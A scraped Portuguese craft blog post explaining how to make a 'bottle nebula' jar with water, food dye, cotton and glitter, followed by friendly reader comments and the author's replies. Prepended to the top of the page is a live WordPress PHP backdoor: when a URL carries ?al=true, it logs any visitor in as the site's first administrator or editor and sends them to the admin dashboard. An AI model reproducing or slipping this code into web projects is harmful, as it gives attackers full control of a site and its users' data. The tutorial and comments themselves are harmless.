// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2);
![]() |
| Minha Bottle Nebula pronta! |
Vamos precisar de:
01. Algodão e Palito (usei de unha mesmo!)
02. Água
03. Anilina ou corante SOLÚVEL EM ÁGUA
04. Pote de vidro transparente, limpo e com tampa
05. Glitter (usei prata e um de luas coloridas) (catei as luas transparentes pra colocar kkk’)
Como Fazer:
![]() |
| Coloque água até a metade do pote e coloque UM POUQUINHO de anilina |
![]() |
| Vá adicionando pedaços de algodão (Se necessário, com a ajuda do palito) |
![]() |
| Coloque um pouco de glitter, feche o pote e sacuda bem. |
![]() |
| Vá repetindo todos os processos (Mas coloque anilina só quando necessário) Até que o pote fique cheio. PRONTO! |
Agora, algumas dicas que antes eram minhas principais dúvidas:
Laura Marques
Eu fiz mas o meu ficou feinho ;/ aeauhe é que tentei fazer um degrade de azul para roxo e não ficou legal, e também, não tinha purpurina, o glitter que coloquei nem apareceu ;/
Mas achei o seu potinho liiindo e adorei a ideia das luas!
http://o-doce-mundo.blogspot.com.br/
Helton Nunes
Que lindo, eu sou louco pra fazer porém estou esperando a semana do carnaval pois estarei sem aula haha. Faz um vlog ensinando também, (sou meio lerdo com tutoriais escritos kkk) beijos e amei seu blog.
http://www.heltonnunes.com/
Laura Nolasco
Aah, que pena! Tenta de novo, ás vezes fazendo de uma cor só vc consegue… e com o purpurina (ou brocal), as vezes fica melhor também.
Brigada.. apaixonei pelo meu potinho, e as luas são muito amor *-*
Laura Nolasco
Haha, no carnaval então você faz e me conta como ficou! Não sei se eu me sairia muito bem fazendo um vlog, sou meio timida e desajeitada demais pra isso kkk… mas ve os videos que indiquei no post, eles me ajudaram muito!
Blush- se!
Nossa, que fofura! Além de ser lindo, ajuda na decoração! já quero, já quero, já quero!
http://www.blush-se.com/
Am.
Muito bom o Diy, vou tentar depois! 😀
http://www.inovandoconceitos.com/
Laura Nolasco
Verdade… quero fazer mais dois iguais pra deixar na minha escrivaninha… fica lindo!
Beijos!
Isis Preisler
Que lindo que ficou! Eu e a minha irmã também fizemos um para decorar o nosso quarto, se quiser ver: http://irmaspreisler.blogspot.com.br/2014/01/diy-buttle-nebula.html
O resultado é tão lindo mas as fotos realmente não saem fiéis
Bjos
Laura Nolasco
Que bom que gostou. Tenta sim, e me conta se ficou bom!
Beijos
Laura Nolasco
Haha, com certeza vou lá ver! O resultado é linda, mas muuuito dificil de fotografar kkk…
Beijos!
Mariana Leal
Olá, acabo de visitar seu blog e segui-lo. Lhe desejo foco, sucesso e força. Que conquiste muitas realizações através do mesmo. E também convido você e seus/suas leitores/leitoras a conhecer o meu blog: toobege.blogspot.com.br . Beijinhos e espero você lá também *0*
Laura Nolasco
Obrigada por seguir e seja bem vinda! Nossa, tudo em dobro pra você!
Beijos!
Tamy Batista
Oi Laura, como vai?
Fiz post novo e tem seu blog lá…da uma conferida.
XOXO
http://descoladavida.blogspot.com.br/
Laura Nolasco
Oi Tamy,
vi o post e adorei!
Beijos
Lanna B.
Muito legal o tutorial! Já vi outras vezes, mas nunca tentei fazer haha
Beijão!
Lari Alves,
http://justlanna.blogspot.com
Laura Nolasco
Haha, brigada… Acho que vale a pena tentar, é muito fácil e rápido!
Beijos
Claudia Souza
Que facil de fazer :O
E fica tão lindo!
Amei amei
Beijos
leitoraemlondres.blogspot.com
Laura Nolasco
Haha, é sim muito fácil lindo…